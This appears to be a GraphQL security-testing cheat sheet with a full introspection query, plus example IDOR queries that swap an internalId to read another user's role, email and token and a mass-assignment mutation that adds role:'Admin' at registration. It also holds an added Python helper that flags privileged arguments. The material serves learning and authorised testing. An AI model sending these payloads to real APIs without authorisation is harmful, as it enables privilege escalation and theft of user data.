Run the introspection query to map out all methods
Use GraphQL Voyager to display all methods
Use BatchQL or the InQL extension to test all methods for IDORs, SQLi, SSRF, etc.
Definition
Query is an operation to retrieve data (read).
Mutation is an operation used to submit and write data (create, update, and delete).
Subscription is an operation used to send data (read) when an event occurs. Subscription is a way for GraphQL clients to listen to live updates from the server.
{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
query FullIntrospectionQuery {
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    subscriptionType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      args {
        ...InputValue
      }
    }
  }
}
fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}
fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}
fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
      }
    }
  }
}
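As an added example (not from the page), this Python helper reads the JSON that the introspection query above returns and does the "map out all methods" step offline: it renders each root-type operation as an SDL-style signature and flags client-settable arguments with authorization-relevant names, which is the shape of the mass-assignment issue shown in the mutation section. The sample response and the name list are constructed assumptions.

```python
# Constructed sample of the JSON an introspection query returns (trimmed to
# the keys read below); a real response has many more types and fields.
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"},
    "subscriptionType": None,
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "currentUser", "type": {"kind": "OBJECT", "name": "User", "ofType": None},
             "args": [{"name": "internalId", "type": {"kind": "NON_NULL", "name": None,
                       "ofType": {"kind": "SCALAR", "name": "Int", "ofType": None}}}]}]},
        {"kind": "OBJECT", "name": "Mutation", "fields": [
            {"name": "registerAccount", "type": {"kind": "OBJECT", "name": "AuthPayload", "ofType": None},
             "args": [{"name": "nickname", "type": {"kind": "SCALAR", "name": "String", "ofType": None}},
                      {"name": "role", "type": {"kind": "SCALAR", "name": "String", "ofType": None}}]}]},
        {"kind": "OBJECT", "name": "User", "fields": [
            {"name": "email", "args": [], "type": {"kind": "SCALAR", "name": "String", "ofType": None}}]}
    ]}}}

def render_type(t):
    """Render a TypeRef chain as SDL: NON_NULL adds '!', LIST wraps in []."""
    if t["kind"] == "NON_NULL":
        return render_type(t["ofType"]) + "!"
    if t["kind"] == "LIST":
        return "[" + render_type(t["ofType"]) + "]"
    return t["name"]

def iter_fields(response):
    """Yield (type_name, field) for every field of every type in the schema."""
    for typ in response["data"]["__schema"]["types"]:
        for field in typ.get("fields") or []:
            yield typ["name"], field

def list_operations(response):
    """Map 'Query.op' / 'Mutation.op' to a signature; only root types count."""
    schema = response["data"]["__schema"]
    roots = {schema[k]["name"] for k in ("queryType", "mutationType", "subscriptionType") if schema.get(k)}
    ops = {}
    for type_name, field in iter_fields(response):
        if type_name in roots:
            args = ", ".join(f'{a["name"]}: {render_type(a["type"])}' for a in field["args"])
            ops[f'{type_name}.{field["name"]}'] = f'{field["name"]}({args}): {render_type(field["type"])}'
    return ops

# Assumed list of argument names a client should never be allowed to set.
PRIVILEGED_ARG_NAMES = {"role", "isadmin", "admin", "permissions"}

def find_privileged_args(response):
    """Return (operation, argument) pairs that the schema owner should review:
    authorization-relevant values must be assigned server-side, not accepted."""
    return [(f'{t}.{f["name"]}', a["name"]) for t, f in iter_fields(response)
            for a in f.get("args") or [] if a["name"].lower() in PRIVILEGED_ARG_NAMES]
```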
Introspection disabled - Error Messages
IDOR
query {
  currentUser(internalId: 1337) {
    role
    name
    email
    token
  }
}
Change the internalId field
Add extra field
Initial query
query {
  listPosts(postId: 13) {
    title
    description
  }
}
Modified query
query {
  listPosts(postId: 13) {
    title
    description
  }
  user {
    username
    email
    firstName
    lastName
  }
}
Mass Assignment - mutation
Initial query
mutation {
  registerAccount(nickname:"hacker", email:"hacktheplanet@yeswehack.ninja", password:"StrongP@ssword!") {
    token {
      accessToken
    }
    user {
      email
      nickname
      role
    }
  }
}
Modified query - role added
mutation {
  registerAccount(nickname:"hacker", email:"hacktheplanet@yeswehack.ninja", password:"StrongP@ssword!", role:"Admin") {
    token {
      accessToken
    }
    user {
      email
      nickname
      role
    }
  }
}